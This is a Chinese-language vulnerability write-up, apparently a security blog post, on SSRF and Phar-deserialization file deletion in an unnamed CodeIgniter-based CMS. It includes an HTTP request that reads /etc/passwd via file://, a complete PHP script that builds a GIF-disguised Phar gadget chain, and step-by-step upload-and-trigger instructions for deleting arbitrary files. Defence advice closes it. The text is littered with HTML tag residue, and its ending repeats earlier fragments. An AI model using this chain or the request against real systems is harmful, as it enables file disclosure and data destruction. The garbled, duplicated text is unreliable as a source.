某CMS反序列化任意文件删除漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析某CMS系统中存在的两个安全漏洞：SSRF（服务器端请求伪造）漏洞和通过Phar反序列化实现的任意文件删除漏洞。这两个漏洞都存在于该CMS的最新版本中，攻击者可以利用这些漏洞进行服务器端请求伪造和任意文件删除操作。<\/p>

SSRF漏洞分析<\/h2>

漏洞位置<\/h3>
SSRF漏洞存在于`\/Fcms\/Core\/Helper.php<\/code>文件中的dr_catcher_data<\/code>函数。<\/p>`

漏洞代码<\/h3>
function<\/span> dr_catcher_data<\/span>($url, $timeout =<\/span> 0<\/span>, $is_log =<\/span> true<\/span>, $ct =<\/span> 0<\/span>) {
<\/span><\/span>    if<\/span> (!<\/span>$url) {
<\/span><\/span>        return<\/span> ''<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    \/\/ 获取本地文件
<\/span><\/span><\/span><\/span>    if<\/span> (strpos<\/span>($url, 'file:\/\/'<\/span>) ===<\/span> 0<\/span>) {
<\/span><\/span>        return<\/span> file_get_contents<\/span>($url);
<\/span><\/span>    } elseif<\/span> (strpos<\/span>($url, '\/'<\/span>) ===<\/span> 0<\/span> &&<\/span> is_file<\/span>(WEBPATH<\/span>.<\/span>$url)) {
<\/span><\/span>        return<\/span> file_get_contents<\/span>(WEBPATH<\/span>.<\/span>$url);
<\/span><\/span>    } elseif<\/span> (!<\/span>dr_is_url<\/span>($url)) {
<\/span><\/span>        if<\/span> (CI_DEBUG<\/span> &&<\/span> $is_log) {
<\/span><\/span>            log_message<\/span>('error'<\/span>, '获取远程数据失败['<\/span>.<\/span>$url.<\/span>']：地址前缀要求是http开头'<\/span>);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> ''<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ 其他代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>触发点<\/h3>
SSRF漏洞的触发点在\/Fms\/Control\/Admin\/Api.php<\/code>的test_attach<\/code>方法中：<\/p>
public<\/span> function<\/span> test_attach<\/span>() {
<\/span><\/span>    $data =<\/span> \Phpcmf\Service<\/span>::<\/span>L<\/span>('input'<\/span>)-><\/span>post<\/span>('data'<\/span>);
<\/span><\/span>    if<\/span> (!<\/span>$data) {
<\/span><\/span>        $this-><\/span>_json<\/span>(0<\/span>, dr_lang<\/span>('参数错误'<\/span>));
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ ...其他代码...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    elseif<\/span> (strpos<\/span>(dr_catcher_data<\/span>($rt['data'<\/span>]['url'<\/span>]), 'phpcmf'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>        $this-><\/span>_json<\/span>(1<\/span>, dr_lang<\/span>('测试成功：%s'<\/span>, $rt['data'<\/span>]['url'<\/span>]));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

test_attach<\/code>方法接收POST参数data<\/code>，其中包含url<\/code>字段<\/li>
该url<\/code>参数未经任何过滤直接传递给dr_catcher_data<\/code>函数<\/li>
dr_catcher_data<\/code>函数支持多种协议处理，包括file:\/\/<\/code>协议<\/li>
攻击者可以构造恶意URL，使服务器访问内部资源或服务<\/li>
<\/ol>
利用方式<\/h3>
攻击者可以构造如下请求：<\/p>
POST \/admina516ce184c2e.php?c=Api&m=test_attach HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

data[url]=file:\/\/\/etc\/passwd
<\/code><\/pre>
这将导致服务器读取并返回\/etc\/passwd<\/code>文件内容。<\/p>
反序列化任意文件删除漏洞<\/h2>
漏洞位置<\/h3>
Phar反序列化漏洞点位于\/Fms\/Control\/Admin\/Api.php<\/code>中的多个方法，包括：<\/p>

test_attach<\/code><\/li>
test_attach_domain<\/code><\/li>
<\/ul>
漏洞原理<\/h3>
PHP的Phar文件在解析时会自动反序列化其中存储的元数据(metadata)。当系统使用file_exists()<\/code>、is_dir()<\/code>等文件系统函数处理Phar文件时，会触发反序列化操作。<\/p>
POP链构造<\/h3>
失败的第一条链<\/h4>
尝试使用CodeIgniter\Publisher\Publisher<\/code>类：<\/p>
namespace<\/span> CodeIgniter\Publisher<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Publisher<\/span> {
<\/span><\/span>    public<\/span> $scratch =<\/span> "..\/1"<\/span>;
<\/span><\/span>    \/\/ 通过__destruct触发delete scratch
<\/span><\/span><\/span><\/span>    \/\/ 通过new对象触发__construct helper('filesystem')
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Cache\Handlers<\/span>;
<\/span><\/span>class<\/span> MemcachedHandler<\/span> {
<\/span><\/span>    public<\/span> $prefix;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>prefix<\/span> =<\/span> new<\/span> CodeIgniter\Publisher\Publisher<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>失败原因：delete_files()<\/code>函数不存在。<\/p>
成功的第二条链<\/h4>
使用以下类构造POP链：<\/p>

RedisHandler<\/code> (触发点)<\/li>
MemcachedHandler<\/code> (中间跳板)<\/li>
FileHandler<\/code> (最终执行)<\/li>
<\/ol>
序列化代码：<\/p>
namespace<\/span> CodeIgniter\Cache\Handlers<\/span>;
<\/span><\/span>class<\/span> FileHandler<\/span> {
<\/span><\/span>    public<\/span> $prefix;
<\/span><\/span>    public<\/span> $path;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>prefix<\/span> =<\/span> ''<\/span>;
<\/span><\/span>        $this-><\/span>path<\/span> =<\/span> ''<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Session\Handlers<\/span>;
<\/span><\/span>class<\/span> MemcachedHandler<\/span> {
<\/span><\/span>    public<\/span> $lockKey;
<\/span><\/span>    public<\/span> $memcached;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>lockKey<\/span> =<\/span> "D:<\/span>\\<\/span>phpstudy_pro<\/span>\\<\/span>WWW<\/span>\\<\/span>test.test"<\/span>;
<\/span><\/span>        $this-><\/span>memcached<\/span> =<\/span> new<\/span> \CodeIgniter\Cache\Handlers\FileHandler<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Cache\Handlers<\/span>;
<\/span><\/span>class<\/span> RedisHandler<\/span> {
<\/span><\/span>    public<\/span> $redis;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>redis<\/span> =<\/span> new<\/span> \CodeIgniter\Session\Handlers\MemcachedHandler<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$o =<\/span> new<\/span> RedisHandler<\/span>();
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>("GIF89a"<\/span>.<\/span>"<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($o);
<\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>POP链执行流程<\/h3>

RedisHandler<\/code>的__destruct()<\/code>方法被调用<\/li>
调用$this->redis->close()<\/code>，其中$this->redis<\/code>是MemcachedHandler<\/code>对象<\/li>
MemcachedHandler<\/code>的close()<\/code>方法调用$this->memcached->delete($this->lockKey)<\/code><\/li>
FileHandler<\/code>的delete()<\/code>方法执行unlink($this->path . $key)<\/code><\/li>
最终删除$this->lockKey<\/code>指定的文件<\/li>
<\/ol>
漏洞利用步骤<\/h3>


生成Phar文件<\/strong>：使用上述代码生成恶意Phar文件，修改后缀为允许上传的类型（如.txt）<\/p>
<\/li>

上传Phar文件<\/strong>：通过CMS的文件上传功能上传该文件<\/p>

上传点：http:\/\/target.com\/index.php?s=member&app=news&c=home&m=add<\/code><\/li>
<\/ul>
<\/li>

获取上传路径<\/strong>：上传后系统会返回文件路径，如：

\/uploadfile\/202407\/de5d2812b5ba390.txt<\/code><\/p>
<\/li>

触发反序列化<\/strong>：访问test_attach_domain<\/code>功能并构造phar协议路径<\/p>
http:\/\/target.com\/admina516ce184c2e.php?c=Api&m=test_attach_domain
<\/code><\/pre>
在"附件上传目录"中输入：

phar:\/\/uploadfile\/202407\/de5d2812b5ba390.txt\/test.txt<\/code><\/p>
<\/li>

执行结果<\/strong>：系统会解析Phar文件并触发反序列化，最终删除指定文件<\/p>
<\/li>
<\/ol>
防御建议<\/h2>


SSRF防御<\/strong>：<\/p>

在dr_catcher_data<\/code>函数中限制协议类型，禁止file:\/\/<\/code>等危险协议<\/li>
对输入URL进行严格校验，使用白名单机制<\/li>
<\/ul>
<\/li>

反序列化防御<\/strong>：<\/p>

禁用Phar流包装器：stream_wrapper_unregister('phar')<\/code><\/li>
在文件操作前检查文件是否为Phar文件<\/li>
使用ini_set('phar.readonly', '1')<\/code>禁止Phar写入<\/li>
<\/ul>
<\/li>

通用防御<\/strong>：<\/p>

对所有用户输入进行严格过滤和验证<\/li>
实施最小权限原则，限制文件系统操作权限<\/li>
定期更新系统和组件到最新版本<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本文详细分析了某CMS系统中存在的SSRF和Phar反序列化漏洞，展示了从漏洞发现到利用的完整过程。这两个漏洞都源于对用户输入的不当处理，强调了输入验证和安全编码的重要性。开发人员应引以为戒，在代码中实施严格的安全措施，防止此类漏洞的出现。<\/p>

某CMS反序列化任意文件删除漏洞分析与利用<\/h1>

SSRF漏洞分析<\/h2>

漏洞位置<\/h3> SSRF漏洞存在于\/Fcms\/Core\/Helper.php<\/code>文件中的dr_catcher_data<\/code>函数。<\/p>

漏洞原理<\/h3> PHP的Phar文件在解析时会自动反序列化其中存储的元数据(metadata)。当系统使用file_exists()<\/code>、is_dir()<\/code>等文件系统函数处理Phar文件时，会触发反序列化操作。<\/p>

漏洞位置<\/h3>
SSRF漏洞存在于`\/Fcms\/Core\/Helper.php<\/code>文件中的dr_catcher_data<\/code>函数。<\/p>`

漏洞原理<\/h3>
PHP的Phar文件在解析时会自动反序列化其中存储的元数据(metadata)。当系统使用`file_exists()<\/code>、is_dir()<\/code>等文件系统函数处理Phar文件时，会触发反序列化操作。<\/p>`